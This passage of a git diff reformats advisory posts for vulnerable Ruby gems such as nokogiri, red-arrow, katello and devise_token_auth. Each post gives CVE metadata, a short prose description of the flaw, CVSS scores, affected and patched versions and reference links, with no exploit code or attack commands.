-  ghsa: gmg5-r3c4-3fm9
-  url: http://packetstormsecurity.com/files/152263/Fat-Free-CRM-0.19.0-HTML-Injection.html
-  title: Fat Free CRM Cross-site Scripting vulnerability
-  date: 2022-05-24
-  description: |
-    HTML Injection has been discovered in the v0.19.0 version of the Fat
-    Free CRM product via an authenticated request to the /comments URI.
-  cvss_v3: 5.4
----
+---
+layout: advisory
+title: 'CVE-2019-10226 (fat_free_crm): Fat Free CRM Cross-site Scripting vulnerability'
+comments: false
+categories:
+- fat_free_crm
+advisory:
+  gem: fat_free_crm
+  cve: 2019-10226
+  ghsa: gmg5-r3c4-3fm9
+  url: http://packetstormsecurity.com/files/152263/Fat-Free-CRM-0.19.0-HTML-Injection.html
+  title: Fat Free CRM Cross-site Scripting vulnerability
+  date: 2022-05-24
+  description: |
+    HTML Injection has been discovered in the v0.19.0 version of the Fat
+    Free CRM product via an authenticated request to the /comments URI.
+  cvss_v3: 5.4
+---
diff --git a/advisories/_posts/2022-05-24-CVE-2019-12408.md b/advisories/_posts/2022-05-24-CVE-2019-12408.md
index e2973fce..4440d2da 100644
--- a/advisories/_posts/2022-05-24-CVE-2019-12408.md
+++ b/advisories/_posts/2022-05-24-CVE-2019-12408.md
@@ -1,29 +1,29 @@
----
-layout: advisory
-title: 'CVE-2019-12408 (red-arrow): Missing Initialization of Resource in Apache Arrow'
-comments: false
-categories:
-- red-arrow
-advisory:
-  gem: red-arrow
-  cve: 2019-12408
-  ghsa: 8cw2-jv5c-c825
-  url: https://lists.apache.org/thread.html/49f067b1c5fb7493d952580f0d2d032819ba351f7a78743c21126269@%3Cdev.arrow.apache.org%3E
-  title: Missing Initialization of Resource in Apache Arrow
-  date: 2022-05-24
-  description: |
-    It was discovered that the C++ implementation (which underlies the R,
-    Python and Ruby implementations) of Apache Arrow 0.14.0 to 0.14.1 had a uninitialized
-    memory bug when building arrays with null values in some cases. This can lead to
-    uninitialized memory being unintentionally shared if Arrow Arrays are transmitted
-    over the wire (for instance with Flight) or persisted in the streaming IPC and file
-    formats.
-  cvss_v3: 7.5
-  unaffected_versions:
-  - "< 0.14.0"
-  patched_versions:
-  - ">= 0.15.1"
-  related:
-    url:
-    - https://lists.apache.org/thread.html/efd8bbf57427d3c303b5316d208a335f8d0c0dbe0dc4c87cfa995073@%3Cannounce.apache.org%3E
----
+---
+layout: advisory
+title: 'CVE-2019-12408 (red-arrow): Missing Initialization of Resource in Apache Arrow'
+comments: false
+categories:
+- red-arrow
+advisory:
+  gem: red-arrow
+  cve: 2019-12408
+  ghsa: 8cw2-jv5c-c825
+  url: https://lists.apache.org/thread.html/49f067b1c5fb7493d952580f0d2d032819ba351f7a78743c21126269@%3Cdev.arrow.apache.org%3E
+  title: Missing Initialization of Resource in Apache Arrow
+  date: 2022-05-24
+  description: |
+    It was discovered that the C++ implementation (which underlies the R,
+    Python and Ruby implementations) of Apache Arrow 0.14.0 to 0.14.1 had a uninitialized
+    memory bug when building arrays with null values in some cases. This can lead to
+    uninitialized memory being unintentionally shared if Arrow Arrays are transmitted
+    over the wire (for instance with Flight) or persisted in the streaming IPC and file
+    formats.
+  cvss_v3: 7.5
+  unaffected_versions:
+  - "< 0.14.0"
+  patched_versions:
+  - ">= 0.15.1"
+  related:
+    url:
+    - https://lists.apache.org/thread.html/efd8bbf57427d3c303b5316d208a335f8d0c0dbe0dc4c87cfa995073@%3Cannounce.apache.org%3E
+---
diff --git a/advisories/_posts/2022-05-24-CVE-2019-12410.md b/advisories/_posts/2022-05-24-CVE-2019-12410.md
index c9607254..1edc0e46 100644
--- a/advisories/_posts/2022-05-24-CVE-2019-12410.md
+++ b/advisories/_posts/2022-05-24-CVE-2019-12410.md
@@ -1,30 +1,30 @@
----
-layout: advisory
-title: 'CVE-2019-12410 (red-arrow): Missing Initialization of Resource in Apache Arrow'
-comments: false
-categories:
-- red-arrow
-advisory:
-  gem: red-arrow
-  cve: 2019-12410
-  ghsa: cjw4-2w9r-r8mv
-  url: https://lists.apache.org/thread.html/49f067b1c5fb7493d952580f0d2d032819ba351f7a78743c21126269@%3Cdev.arrow.apache.org%3E
-  title: Missing Initialization of Resource in Apache Arrow
-  date: 2022-05-24
-  description: |
-    While investigating UBSAN errors in https://github.com/apache/arrow/pull/5365
-    it was discovered Apache Arrow versions 0.12.0 to 0.14.1, left memory Array data
-    uninitialized when reading RLE null data from parquet. This affected the C++, Python,
-    Ruby and R implementations. The uninitialized memory could potentially be shared
-    if are transmitted over the wire (for instance with Flight) or persisted in the
-    streaming IPC and file formats.
-  cvss_v3: 7.5
-  unaffected_versions:
-  - "< 0.12.0"
-  patched_versions:
-  - ">= 0.15.1"
-  related:
-    url:
-    - https://lists.apache.org/thread.html/efd8bbf57427d3c303b5316d208a335f8d0c0dbe0dc4c87cfa995073@%3Cannounce.apache.org%3E
-    - http://www.openwall.com/lists/oss-security/2019/11/08/1
----
+---
+layout: advisory
+title: 'CVE-2019-12410 (red-arrow): Missing Initialization of Resource in Apache Arrow'
+comments: false
+categories:
+- red-arrow
+advisory:
+  gem: red-arrow
+  cve: 2019-12410
+  ghsa: cjw4-2w9r-r8mv
+  url: https://lists.apache.org/thread.html/49f067b1c5fb7493d952580f0d2d032819ba351f7a78743c21126269@%3Cdev.arrow.apache.org%3E
+  title: Missing Initialization of Resource in Apache Arrow
+  date: 2022-05-24
+  description: |
+    While investigating UBSAN errors in https://github.com/apache/arrow/pull/5365
+    it was discovered Apache Arrow versions 0.12.0 to 0.14.1, left memory Array data
+    uninitialized when reading RLE null data from parquet. This affected the C++, Python,
+    Ruby and R implementations. The uninitialized memory could potentially be shared
+    if are transmitted over the wire (for instance with Flight) or persisted in the
+    streaming IPC and file formats.
+  cvss_v3: 7.5
+  unaffected_versions:
+  - "< 0.12.0"
+  patched_versions:
+  - ">= 0.15.1"
+  related:
+    url:
+    - https://lists.apache.org/thread.html/efd8bbf57427d3c303b5316d208a335f8d0c0dbe0dc4c87cfa995073@%3Cannounce.apache.org%3E
+    - http://www.openwall.com/lists/oss-security/2019/11/08/1
+---
diff --git a/advisories/_posts/2022-05-24-CVE-2019-13118.md b/advisories/_posts/2022-05-24-CVE-2019-13118.md
index 08a4b745..9a32f6c7 100644
--- a/advisories/_posts/2022-05-24-CVE-2019-13118.md
+++ b/advisories/_posts/2022-05-24-CVE-2019-13118.md
@@ -1,69 +1,69 @@
----
-layout: advisory
-title: 'CVE-2019-13118 (nokogiri): libxslt Type Confusion vulnerability that affects
-  Nokogiri'
-comments: false
-categories:
-- nokogiri
-advisory:
-  gem: nokogiri
-  cve: 2019-13118
-  ghsa: cf46-6xxh-pc75
-  url: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=15069
-  title: libxslt Type Confusion vulnerability that affects Nokogiri
-  date: 2022-05-24
-  description: |
-    In `numbers.c` in libxslt 1.1.33, a type holding grouping characters of an `xsl:number` instruction was too narrow and an invalid character/length combination could be passed to `xsltNumberFormatDecimal`, leading to a read of uninitialized stack data.
-
-    Nokogiri prior to version 1.10.5 used a vulnerable version of libxslt. Nokogiri 1.10.5 updated libxslt to version 1.1.34 to address this and other vulnerabilities in libxslt.
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 1.10.5"
-  related:
-    url:
-    - https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=15069
-    - https://gitlab.gnome.org/GNOME/libxslt/commit/6ce8de69330783977dd14f6569419489875fb71b
-    - https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E
-    - https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E
-    - https://lists.debian.org/debian-lts-announce/2019/07/msg00020.html
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IOYJKXPQCUNBMMQJWYXOR6QRUJZHEDRZ/
-    - https://oss-fuzz.com/testcase-detail/5197371471822848
-    - https://seclists.org/bugtraq/2019/Aug/21
-    - https://seclists.org/bugtraq/2019/Aug/22
-    - https://seclists.org/bugtraq/2019/Aug/23
-    - https://seclists.org/bugtraq/2019/Aug/25
-    - https://seclists.org/bugtraq/2019/Jul/35
-    - https://seclists.org/bugtraq/2019/Jul/36
-    - https://seclists.org/bugtraq/2019/Jul/37
-    - https://seclists.org/bugtraq/2019/Jul/40
-    - https://seclists.org/bugtraq/2019/Jul/41
-    - https://seclists.org/bugtraq/2019/Jul/42
-    - https://security.netapp.com/advisory/ntap-20190806-0004/
-    - https://security.netapp.com/advisory/ntap-20200122-0003/
-    - https://support.apple.com/kb/HT210346
-    - https://support.apple.com/kb/HT210348
-    - https://support.apple.com/kb/HT210351
-    - https://support.apple.com/kb/HT210353
-    - https://support.apple.com/kb/HT210356
-    - https://support.apple.com/kb/HT210357
-    - https://support.apple.com/kb/HT210358
-    - https://usn.ubuntu.com/4164-1/
-    - https://www.oracle.com/security-alerts/cpujan2020.html
-    - http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00062.html
-    - http://seclists.org/fulldisclosure/2019/Aug/11
-    - http://seclists.org/fulldisclosure/2019/Aug/13
-    - http://seclists.org/fulldisclosure/2019/Aug/14
-    - http://seclists.org/fulldisclosure/2019/Aug/15
-    - http://seclists.org/fulldisclosure/2019/Jul/22
-    - http://seclists.org/fulldisclosure/2019/Jul/23
-    - http://seclists.org/fulldisclosure/2019/Jul/24
-    - http://seclists.org/fulldisclosure/2019/Jul/26
-    - http://seclists.org/fulldisclosure/2019/Jul/31
-    - http://seclists.org/fulldisclosure/2019/Jul/37
-    - http://seclists.org/fulldisclosure/2019/Jul/38
-    - http://www.openwall.com/lists/oss-security/2019/11/17/2
-    - https://github.com/sparklemotion/nokogiri/issues/1943
-    - https://github.com/sparklemotion/nokogiri/commit/43a175339b47b8c604508813fc75b83f13cd173e
-    - https://github.com/sparklemotion/nokogiri/blob/f7aa3b0b29d6fe5fafe93dacd9b96b6b3d16b7ec/CHANGELOG.md?plain=1#L796
-    - https://github.com/sparklemotion/nokogiri/releases/tag/v1.10.5
----
+---
+layout: advisory
+title: 'CVE-2019-13118 (nokogiri): libxslt Type Confusion vulnerability that affects
+  Nokogiri'
+comments: false
+categories:
+- nokogiri
+advisory:
+  gem: nokogiri
+  cve: 2019-13118
+  ghsa: cf46-6xxh-pc75
+  url: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=15069
+  title: libxslt Type Confusion vulnerability that affects Nokogiri
+  date: 2022-05-24
+  description: |
+    In `numbers.c` in libxslt 1.1.33, a type holding grouping characters of an `xsl:number` instruction was too narrow and an invalid character/length combination could be passed to `xsltNumberFormatDecimal`, leading to a read of uninitialized stack data.
+
+    Nokogiri prior to version 1.10.5 used a vulnerable version of libxslt. Nokogiri 1.10.5 updated libxslt to version 1.1.34 to address this and other vulnerabilities in libxslt.
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 1.10.5"
+  related:
+    url:
+    - https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=15069
+    - https://gitlab.gnome.org/GNOME/libxslt/commit/6ce8de69330783977dd14f6569419489875fb71b
+    - https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E
+    - https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E
+    - https://lists.debian.org/debian-lts-announce/2019/07/msg00020.html
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IOYJKXPQCUNBMMQJWYXOR6QRUJZHEDRZ/
+    - https://oss-fuzz.com/testcase-detail/5197371471822848
+    - https://seclists.org/bugtraq/2019/Aug/21
+    - https://seclists.org/bugtraq/2019/Aug/22
+    - https://seclists.org/bugtraq/2019/Aug/23
+    - https://seclists.org/bugtraq/2019/Aug/25
+    - https://seclists.org/bugtraq/2019/Jul/35
+    - https://seclists.org/bugtraq/2019/Jul/36
+    - https://seclists.org/bugtraq/2019/Jul/37
+    - https://seclists.org/bugtraq/2019/Jul/40
+    - https://seclists.org/bugtraq/2019/Jul/41
+    - https://seclists.org/bugtraq/2019/Jul/42
+    - https://security.netapp.com/advisory/ntap-20190806-0004/
+    - https://security.netapp.com/advisory/ntap-20200122-0003/
+    - https://support.apple.com/kb/HT210346
+    - https://support.apple.com/kb/HT210348
+    - https://support.apple.com/kb/HT210351
+    - https://support.apple.com/kb/HT210353
+    - https://support.apple.com/kb/HT210356
+    - https://support.apple.com/kb/HT210357
+    - https://support.apple.com/kb/HT210358
+    - https://usn.ubuntu.com/4164-1/
+    - https://www.oracle.com/security-alerts/cpujan2020.html
+    - http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00062.html
+    - http://seclists.org/fulldisclosure/2019/Aug/11
+    - http://seclists.org/fulldisclosure/2019/Aug/13
+    - http://seclists.org/fulldisclosure/2019/Aug/14
+    - http://seclists.org/fulldisclosure/2019/Aug/15
+    - http://seclists.org/fulldisclosure/2019/Jul/22
+    - http://seclists.org/fulldisclosure/2019/Jul/23
+    - http://seclists.org/fulldisclosure/2019/Jul/24
+    - http://seclists.org/fulldisclosure/2019/Jul/26
+    - http://seclists.org/fulldisclosure/2019/Jul/31
+    - http://seclists.org/fulldisclosure/2019/Jul/37
+    - http://seclists.org/fulldisclosure/2019/Jul/38
+    - http://www.openwall.com/lists/oss-security/2019/11/17/2
+    - https://github.com/sparklemotion/nokogiri/issues/1943
+    - https://github.com/sparklemotion/nokogiri/commit/43a175339b47b8c604508813fc75b83f13cd173e
+    - https://github.com/sparklemotion/nokogiri/blob/f7aa3b0b29d6fe5fafe93dacd9b96b6b3d16b7ec/CHANGELOG.md?plain=1#L796
+    - https://github.com/sparklemotion/nokogiri/releases/tag/v1.10.5
+---
diff --git a/advisories/_posts/2022-05-24-CVE-2019-14825.md b/advisories/_posts/2022-05-24-CVE-2019-14825.md
index ea334adb..b311a30d 100644
--- a/advisories/_posts/2022-05-24-CVE-2019-14825.md
+++ b/advisories/_posts/2022-05-24-CVE-2019-14825.md
@@ -1,31 +1,31 @@
----
-layout: advisory
-title: 'CVE-2019-14825 (katello): Katello cleartext password storage issue'
-comments: false
-categories:
-- katello
-advisory:
-  gem: katello
-  cve: 2019-14825
-  ghsa: m4wh-848j-9w2r
-  url: https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14825
-  title: Katello cleartext password storage issue
-  date: 2022-05-24
-  description: |
-    A cleartext password storage issue was discovered in Katello, versions
-    3.x.x.x before katello 3.12.2. Registry credentials used during container image
-    discovery were inadvertently logged without being masked. This flaw could expose
-    the registry credentials to other privileged users.
-  cvss_v3: 2.7
-  patched_versions:
-  - ">= 3.12.2"
-  related:
-    url:
-    - https://github.com/Katello/katello/pull/8244
-    - https://github.com/Katello/katello/pull/8253
-    - https://github.com/Katello/katello/commit/332484232b66b7907a8104a19ea97eb697b75c79
-    - https://github.com/Katello/katello/commit/4eefa678a905140620ca8b390d48fe318d36e4ea
-    - https://bugzilla.redhat.com/show_bug.cgi?id=1730668
-    - https://github.com/Katello/katello/commits/3.12.2
-    - https://projects.theforeman.org/issues/27485
----
+---
+layout: advisory
+title: 'CVE-2019-14825 (katello): Katello cleartext password storage issue'
+comments: false
+categories:
+- katello
+advisory:
+  gem: katello
+  cve: 2019-14825
+  ghsa: m4wh-848j-9w2r
+  url: https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14825
+  title: Katello cleartext password storage issue
+  date: 2022-05-24
+  description: |
+    A cleartext password storage issue was discovered in Katello, versions
+    3.x.x.x before katello 3.12.2. Registry credentials used during container image
+    discovery were inadvertently logged without being masked. This flaw could expose
+    the registry credentials to other privileged users.
+  cvss_v3: 2.7
+  patched_versions:
+  - ">= 3.12.2"
+  related:
+    url:
+    - https://github.com/Katello/katello/pull/8244
+    - https://github.com/Katello/katello/pull/8253
+    - https://github.com/Katello/katello/commit/332484232b66b7907a8104a19ea97eb697b75c79
+    - https://github.com/Katello/katello/commit/4eefa678a905140620ca8b390d48fe318d36e4ea
+    - https://bugzilla.redhat.com/show_bug.cgi?id=1730668
+    - https://github.com/Katello/katello/commits/3.12.2
+    - https://projects.theforeman.org/issues/27485
+---
diff --git a/advisories/_posts/2022-05-24-CVE-2019-16751.md b/advisories/_posts/2022-05-24-CVE-2019-16751.md
index ae28701a..67ba4ac9 100644
--- a/advisories/_posts/2022-05-24-CVE-2019-16751.md
+++ b/advisories/_posts/2022-05-24-CVE-2019-16751.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2019-16751 (devise_token_auth): Devise Token Auth vulnerable to Cross-site
-  Scripting'
-comments: false
-categories:
-- devise_token_auth
-advisory:
-  gem: devise_token_auth
-  cve: 2019-16751
-  ghsa: mvqr-r76c-wm5f
-  url: https://github.com/lynndylanhurley/devise_token_auth/issues/1332
-  title: Devise Token Auth vulnerable to Cross-site Scripting
-  date: 2022-05-24
-  description: |
-    An issue was discovered in Devise Token Auth through 1.1.2. The omniauth
-    failure endpoint is vulnerable to Reflected Cross Site Scripting (XSS) through the
-    message parameter. Unauthenticated attackers can craft a URL that executes a malicious
-    JavaScript payload in the victim's browser. This affects the fallback_render method
-    in the omniauth callbacks controller.
-  cvss_v3: 6.1
-  unaffected_versions:
-  - "< 0.1.33"
-  patched_versions:
-  - ">= 1.1.3"
----
+---
+layout: advisory
+title: 'CVE-2019-16751 (devise_token_auth): Devise Token Auth vulnerable to Cross-site
+  Scripting'
+comments: false
+categories:
+- devise_token_auth
+advisory:
+  gem: devise_token_auth
+  cve: 2019-16751
+  ghsa: mvqr-r76c-wm5f
+  url: https://github.com/lynndylanhurley/devise_token_auth/issues/1332
+  title: Devise Token Auth vulnerable to Cross-site Scripting
+  date: 2022-05-24
+  description: |
+    An issue was discovered in Devise Token Auth through 1.1.2. The omniauth
+    failure endpoint is vulnerable to Reflected Cross Site Scripting (XSS) through the
+    message parameter. Unauthenticated attackers can craft a URL that executes a malicious
+    JavaScript payload in the victim's browser. This affects the fallback_render method
+    in the omniauth callbacks controller.
+  cvss_v3: 6.1
+  unaffected_versions:
+  - "< 0.1.33"
+  patched_versions:
+  - ">= 1.1.3"
+---
diff --git a/advisories/_posts/2022-05-24-CVE-2019-17268.md b/advisories/_posts/2022-05-24-CVE-2019-17268.md
index 6db0d835..1383431d 100644
--- a/advisories/_posts/2022-05-24-CVE-2019-17268.md
+++ b/advisories/_posts/2022-05-24-CVE-2019-17268.md
@@ -1,27 +1,27 @@
----
-layout: advisory
-title: 'CVE-2019-17268 (omniauth-weibo-oauth2): omniauth-weibo-oauth2 included a code-execution
-  backdoor inserted by a third-party'
-comments: false
-categories:
-- omniauth-weibo-oauth2
-advisory:
-  gem: omniauth-weibo-oauth2
-  cve: 2019-17268
-  ghsa: vr22-43gj-rx3f
-  url: https://github.com/beenhero/omniauth-weibo-oauth2/issues/36
-  title: omniauth-weibo-oauth2 included a code-execution backdoor inserted by a third-party
-  date: 2022-05-24
-  description: |
-    The omniauth-weibo-oauth2 gem 0.4.6 for Ruby, as distributed on RubyGems.org,
-    included a code-execution backdoor inserted by a third party. Versions through 0.4.5,
-    and 0.5.1 and later, are unaffected.
-  cvss_v3: 9.8
-  unaffected_versions:
-  - "< 0.4.6"
-  patched_versions:
-  - ">= 0.5.1"
-  related:
-    url:
-    - https://diff.coditsu.io/diffs/09a05c37-1b34-49e1-ac94-d4dda40d1ad1#d2h-971595
----
+---
+layout: advisory
+title: 'CVE-2019-17268 (omniauth-weibo-oauth2): omniauth-weibo-oauth2 included a code-execution
+  backdoor inserted by a third-party'
+comments: false
+categories:
+- omniauth-weibo-oauth2
+advisory:
+  gem: omniauth-weibo-oauth2
+  cve: 2019-17268
+  ghsa: vr22-43gj-rx3f
+  url: https://github.com/beenhero/omniauth-weibo-oauth2/issues/36
+  title: omniauth-weibo-oauth2 included a code-execution backdoor inserted by a third-party
+  date: 2022-05-24
+  description: |
+    The omniauth-weibo-oauth2 gem 0.4.6 for Ruby, as distributed on RubyGems.org,
+    included a code-execution backdoor inserted by a third party. Versions through 0.4.5,
+    and 0.5.1 and later, are unaffected.
+  cvss_v3: 9.8
+  unaffected_versions:
+  - "< 0.4.6"
+  patched_versions:
+  - ">= 0.5.1"
+  related:
+    url:
+    - https://diff.coditsu.io/diffs/09a05c37-1b34-49e1-ac94-d4dda40d1ad1#d2h-971595
+---
diff --git a/advisories/_posts/2022-05-24-CVE-2019-18197.md b/advisories/_posts/2022-05-24-CVE-2019-18197.md
index 724c0c13..c5079ab4 100644
--- a/advisories/_posts/2022-05-24-CVE-2019-18197.md
+++ b/advisories/_posts/2022-05-24-CVE-2019-18197.md
@@ -1,51 +1,51 @@
----
-layout: advisory
-title: 'CVE-2019-18197 (nokogiri): Nokogiri affected by libxslt Use of Uninitialized
-  Resource/ Use After Free vulnerability'
-comments: false
-categories:
-- nokogiri
-advisory:
-  gem: nokogiri
-  cve: 2019-18197
-  ghsa: 242x-7cm6-4w8j
-  url: https://github.com/sparklemotion/nokogiri/issues/1943
-  title: Nokogiri affected by libxslt Use of Uninitialized Resource/ Use After Free
-    vulnerability
-  date: 2022-05-24
-  description: |
-    In xsltCopyText in transform.c in libxslt 1.1.33, a pointer variable
-    isn't reset under certain circumstances. If the relevant memory area
-    happened to be freed and reused in a certain way, a bounds check could
-    fail and memory outside a buffer could be written to, or uninitialized
-    data could be disclosed.
-
-    Nokogiri prior to version 1.10.5 contains a vulnerable version of
-    libxslt. Nokogiri version 1.10.5 upgrades the dependency to
-    libxslt 1.1.34, which contains a patch for this issue.
-  cvss_v2: 5.1
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 1.10.5"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2019-18197
-    - https://github.com/sparklemotion/nokogiri/issues/1943
-    - https://github.com/sparklemotion/nokogiri/blob/01ab95f3e37429ed8d3b380a8d2f73902eb325d9/CHANGELOG.md?plain=1#L934
-    - https://access.redhat.com/errata/RHSA-2020:0514
-    - https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=15746
-    - https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=15768
-    - https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=15914
-    - https://gitlab.gnome.org/GNOME/libxslt/commit/2232473733b7313d67de8836ea3b29eec6e8e285
-    - https://lists.debian.org/debian-lts-announce/2019/10/msg00037.html
-    - https://security.netapp.com/advisory/ntap-20191031-0004
-    - https://security.netapp.com/advisory/ntap-20200416-0004
-    - https://usn.ubuntu.com/4164-1
-    - https://www.oracle.com/security-alerts/cpuapr2020.html
-    - http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00010.html
-    - http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00015.html
-    - http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00025.html
-    - http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00062.html
-    - http://www.openwall.com/lists/oss-security/2019/11/17/2
-    - https://github.com/advisories/GHSA-242x-7cm6-4w8j
----
+---
+layout: advisory
+title: 'CVE-2019-18197 (nokogiri): Nokogiri affected by libxslt Use of Uninitialized
+  Resource/ Use After Free vulnerability'
+comments: false
+categories:
+- nokogiri
+advisory:
+  gem: nokogiri
+  cve: 2019-18197
+  ghsa: 242x-7cm6-4w8j
+  url: https://github.com/sparklemotion/nokogiri/issues/1943
+  title: Nokogiri affected by libxslt Use of Uninitialized Resource/ Use After Free
+    vulnerability
+  date: 2022-05-24
+  description: |
+    In xsltCopyText in transform.c in libxslt 1.1.33, a pointer variable
+    isn't reset under certain circumstances. If the relevant memory area
+    happened to be freed and reused in a certain way, a bounds check could
+    fail and memory outside a buffer could be written to, or uninitialized
+    data could be disclosed.
+
+    Nokogiri prior to version 1.10.5 contains a vulnerable version of
+    libxslt. Nokogiri version 1.10.5 upgrades the dependency to
+    libxslt 1.1.34, which contains a patch for this issue.
+  cvss_v2: 5.1
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 1.10.5"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-18197
+    - https://github.com/sparklemotion/nokogiri/issues/1943
+    - https://github.com/sparklemotion/nokogiri/blob/01ab95f3e37429ed8d3b380a8d2f73902eb325d9/CHANGELOG.md?plain=1#L934
+    - https://access.redhat.com/errata/RHSA-2020:0514
+    - https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=15746
+    - https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=15768
+    - https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=15914
+    - https://gitlab.gnome.org/GNOME/libxslt/commit/2232473733b7313d67de8836ea3b29eec6e8e285
+    - https://lists.debian.org/debian-lts-announce/2019/10/msg00037.html
+    - https://security.netapp.com/advisory/ntap-20191031-0004
+    - https://security.netapp.com/advisory/ntap-20200416-0004
+    - https://usn.ubuntu.com/4164-1
+    - https://www.oracle.com/security-alerts/cpuapr2020.html
+    - http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00010.html
+    - http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00015.html
+    - http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00025.html
+    - http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00062.html
+    - http://www.openwall.com/lists/oss-security/2019/11/17/2
+    - https://github.com/advisories/GHSA-242x-7cm6-4w8j
+---
diff --git a/advisories/_posts/2022-05-24-CVE-2019-5815.md b/advisories/_posts/2022-05-24-CVE-2019-5815.md
index f678772a..b39058af 100644
--- a/advisories/_posts/2022-05-24-CVE-2019-5815.md
+++ b/advisories/_posts/2022-05-24-CVE-2019-5815.md
@@ -1,34 +1,34 @@
----
-layout: advisory
-title: 'CVE-2019-5815 (nokogiri): Nokogiri implementation of libxslt vulnerable to
-  heap corruption'
-comments: false
-categories:
-- nokogiri
-advisory:
-  gem: nokogiri
-  cve: 2019-5815
-  ghsa: vmfx-gcfq-wvm2
-  url: https://github.com/sparklemotion/nokogiri/issues/2630
-  title: Nokogiri implementation of libxslt vulnerable to heap corruption
-  date: 2022-05-24
-  description: |
-    Type confusion in `xsltNumberFormatGetMultipleLevel` prior to
-    libxslt 1.1.33 could allow attackers to potentially exploit heap
-    corruption via crafted XML data.
-
-    Nokogiri prior to version 1.10.5 contains a vulnerable version of
-    libxslt. Nokogiri version 1.10.5 upgrades the dependency to
-    libxslt 1.1.34, which contains a patch for this issue.
-  cvss_v2: 5.0
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 1.10.5"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2019-5815
-    - https://github.com/sparklemotion/nokogiri/issues/2630
-    - https://gitlab.gnome.org/GNOME/libxslt/commit/08b62c25871b38d5d573515ca8a065b4b8f64f6b
-    - https://lists.debian.org/debian-lts-announce/2022/09/msg00010.html
-    - https://github.com/advisories/GHSA-vmfx-gcfq-wvm2
----
+---
+layout: advisory
+title: 'CVE-2019-5815 (nokogiri): Nokogiri implementation of libxslt vulnerable to
+  heap corruption'
+comments: false
+categories:
+- nokogiri
+advisory:
+  gem: nokogiri
+  cve: 2019-5815
+  ghsa: vmfx-gcfq-wvm2
+  url: https://github.com/sparklemotion/nokogiri/issues/2630
+  title: Nokogiri implementation of libxslt vulnerable to heap corruption
+  date: 2022-05-24
+  description: |
+    Type confusion in `xsltNumberFormatGetMultipleLevel` prior to
+    libxslt 1.1.33 could allow attackers to potentially exploit heap
+    corruption via crafted XML data.
+
+    Nokogiri prior to version 1.10.5 contains a vulnerable version of
+    libxslt. Nokogiri version 1.10.5 upgrades the dependency to
+    libxslt 1.1.34, which contains a patch for this issue.
+  cvss_v2: 5.0
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 1.10.5"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-5815
+    - https://github.com/sparklemotion/nokogiri/issues/2630
+    - https://gitlab.gnome.org/GNOME/libxslt/commit/08b62c25871b38d5d573515ca8a065b4b8f64f6b
+    - https://lists.debian.org/debian-lts-announce/2022/09/msg00010.html
+    - https://github.com/advisories/GHSA-vmfx-gcfq-wvm2
+---
diff --git a/advisories/_posts/2022-05-24-CVE-2019-7615.md b/advisories/_posts/2022-05-24-CVE-2019-7615.md
index dc56b51e..7a4f9dbe 100644
--- a/advisories/_posts/2022-05-24-CVE-2019-7615.md
+++ b/advisories/_posts/2022-05-24-CVE-2019-7615.md
@@ -1,27 +1,27 @@
----
-layout: advisory
-title: 'CVE-2019-7615 (elastic-apm): Elastic APM agent for Ruby vulnerable to Improper
-  Certificate Validation'
-comments: false
-categories:
-- elastic-apm
-advisory:
-  gem: elastic-apm
-  cve: 2019-7615
-  ghsa: 35j2-p8fh-x966
-  url: https://github.com/elastic/apm-agent-ruby/pull/449
-  title: Elastic APM agent for Ruby vulnerable to Improper Certificate Validation
-  date: 2022-05-24
-  description: |
-    A TLS certificate validation flaw was found in Elastic APM agent for
-    Ruby versions before 2.9.0. When specifying a trusted server CA certificate via
-    the `server_ca_cert` setting, the Ruby agent would not properly verify the certificate
-    returned by the APM server. This could result in a man in the middle style attack
-    against the Ruby agent.
-  cvss_v3: 7.4
-  patched_versions:
-  - ">= 2.9.0"
-  related:
-    url:
-    - https://www.elastic.co/community/security/
----
+---
+layout: advisory
+title: 'CVE-2019-7615 (elastic-apm): Elastic APM agent for Ruby vulnerable to Improper
+  Certificate Validation'
+comments: false
+categories:
+- elastic-apm
+advisory:
+  gem: elastic-apm
+  cve: 2019-7615
+  ghsa: 35j2-p8fh-x966
+  url: https://github.com/elastic/apm-agent-ruby/pull/449
